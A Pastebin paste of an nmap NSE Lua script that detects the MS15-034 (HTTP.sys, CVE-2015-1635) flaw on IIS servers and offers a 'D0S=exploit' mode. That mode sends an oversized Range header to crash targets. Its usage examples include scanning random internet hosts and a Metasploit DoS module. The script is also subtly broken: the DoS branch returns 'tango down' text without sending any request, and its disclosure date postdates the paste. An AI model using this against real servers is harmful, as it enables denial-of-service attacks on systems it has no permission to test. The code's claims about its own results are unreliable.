Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

ms15-034.nse (http.sys vulnerability check/exploit)

r00t-3xp10it Jun 15th, 2015 (edited) 899 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. -- Original nse module written by: DigitalStroopwafel
  2. -- Port nmap nse script to: /usr/share/nmap/scripts
  3. -- Update database: sudo nmap --script-updatedb
  4. -- Usage: sudo nmap --script-help ms15-034.nse
  5. -- Usage: sudo nmap -sV -Pn -p 80 --script ms15-034.nse <target>
  6. -- Usage: sudo nmap -sS -Pn -p 80 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  7.  
  8.  
  9. -- Dependencies (Lua libs)
  10. -- all dependencies are satisfied (nmap default installation)..
  11. local http = require('http')
  12. local string = require('string')
  13. local shortport = require('shortport')
  14. local stdnse = require ('stdnse')
  15. local vulns = require ('vulns')
  16.  
  17.  
  18. description = [[
  19.  
  20. author: DigitalStroopwafel, r00t-3xp10it
  21. Detects for the MS15-034 (HTTP.sys) vulnerability on Microsoft IIS servers. and exploit
  22. it using script args (--script-args D0S=exploit) or we can scan further using another
  23. argument (--script-args uri=/wellcome.png), Affected versions are Windows 7, 8,
  24. 8.1, Windows Server 2008 R2, 2012 and 2012R2.
  25.  
  26. Some syntax examples:
  27. nmap -sV -Pn -p 80 --script vuln <target>
  28. nmap -sV -Pn -p 80 --script ms15-034.nse <target>
  29. nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri <target>
  30. nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit <target>
  31. nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  32. nmap -sS -sV -T3 -iR 30 -Pn -p 80,443,631,5800 --open --reason --script ms15-034.nse -oN /root/nmap-report.log
  33. ]]
  34.  
  35. ---
  36. -- @usage
  37. -- nmap --script-help ms15-034.nse
  38. -- nmap -sV -Pn -p 80 --script vuln <target>
  39. -- nmap -sS -Pn -p 80 --script ms15-034.nse <target>
  40. -- nmap -sV -Pn -p 80 --script ms15-034.nse --script-args uri=/anotheruri/ <target>
  41. -- nmap -sV -Pn -p 80,443,631,5800 --script ms15-034.nse --script-args D0S=exploit <target>
  42. -- nmap -sS -Pn -p 80,443 --script ms15-034.nse --script-args "uri=/welcome.png, D0S=exploit" <target>
  43. -- @output
  44. -- PORT   STATE SERVICE
  45. -- 80/tcp open  http
  46. -- |_ms15-034: http.sys its Vulnerable
  47. -- |   State: VULNERABLE
  48. -- |     IDs: CVE-2015-1635
  49. -- |     Response: 416 (exploitable)
  50. -- |     Disclosure date: 2015-06-17
  51. -- |     Author: DigitalStroopwafel(module)
  52. -- |             r00t-3xp10it(review)
  53. -- |
  54. -- |     Description:
  55. -- |     http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on
  56. -- |     HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,
  57. -- |     Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.
  58. -- |     Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit <target>
  59. -- |     Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd
  60. -- |
  61. -- |     References:
  62. -- |     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
  63. -- |     https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
  64. -- |     http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd
  65. -- |_
  66. -- @args ms15-034.uri URI to use in request. Default: /
  67. -- @args ms15-034.D0S exploit the Denial-Of-Service condition
  68. ---
  69.  
  70.  
  71. author = "DigitalStroopwafel, r00t-3xp10it"
  72. license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
  73. categories = {"vuln", "dos"}
  74.  
  75.  
  76.  
  77. -- THE RULES SECTION --
  78. -- portrule = shortport.http [added port number and service to portrule]
  79. portrule = shortport.port_or_service({80, 443, 631, 5800}, "http, https, ipp, vnc", "tcp", "open")
  80. -- local uri = "/" [updated to use script arguments (anotheruri)]
  81. local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
  82.  
  83.  
  84. -- THE ACTION SECTION --
  85. action = function(host, port)
  86. local options = {header={}}
  87. options['header']['User-Agent'] = "Mozilla/5.0 (compatible; EvilMonkey)"
  88. options['header']['Host'] = stdnse.generate_random_string(8)
  89.  
  90.  
  91. -- special thanks to 'sathisharthars' POC 'https://goo.gl/lVO1x3'
  92. -- change this script range byte from "0-" to "18-" to exploit D0S
  93. -- using script args to run denial-of-service or scanning for vulnerability
  94. local D0S = stdnse.get_script_args(SCRIPT_NAME..".D0S")
  95.   if (D0S == "exploit") then
  96.     options['header']['Range'] = "bytes=18-18446744073709551615"
  97.     return "Executing Denial-Of-Service Condition...\nstatus  : please ping target to comfirm tango down..."
  98.   else
  99.     options['header']['Range'] = "bytes=0-18446744073709551615"
  100. end
  101.  
  102.  
  103. -- get response from target website
  104. local response = http.get(host, port, uri, options)
  105. local title = string.match(response.body, "<[Tt][Ii][Tt][Ll][Ee][^>]*>([^<]*)</[Tt][Ii][Tt][Ll][Ee]>")
  106.  
  107. -- display target response (script output)
  108. if ( title == "Requested Range Not Satisfiable" ) then
  109.   return "http.sys its Vulnerable\n   State: VULNERABLE\n     IDs: CVE-2015-1635\n     Response: "..response.status.." (exploitable)\n     Disclosure date: 2015-06-17\n     Author: DigitalStroopwafel(module)\n             r00t-3xp10it(review)\n\n     Description:\n     http.sys 'remote code execution vulnerability' and 'denial-of-service' vulnerabilitys on\n     on HTTP protocol stack (Microsoft IIS), affected versions are Windows 7, Windows Server 2008 R2,\n     Windows 8, Windows Server 2012, Windows 8.1, and Windows Server 2012 R2.\n     Exploit: nmap -sV -p 80 --script ms15-034.nse --script-args D0S=exploit <target>\n     Exploit: msf > use auxiliary/dos/http/ms15_034_ulonglongadd\n\n     References:\n     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635\n     https://technet.microsoft.com/en-us/library/security/ms15-034.aspx\n     http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd\n\n"
  110.  
  111. else
  112.  
  113.   return "http.sys not Vulnerable\n   State: NOT VULNERABLE\n     IDs: CVE-2015-1635\n     Response: "..response.status.." (we need: 416)\n     Disclosure date: 2015-06-17\n     Author: DigitalStroopwafel(module)\n             r00t-3xp10it(review)\n\n"
  114.  
  115.   end
  116. end
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top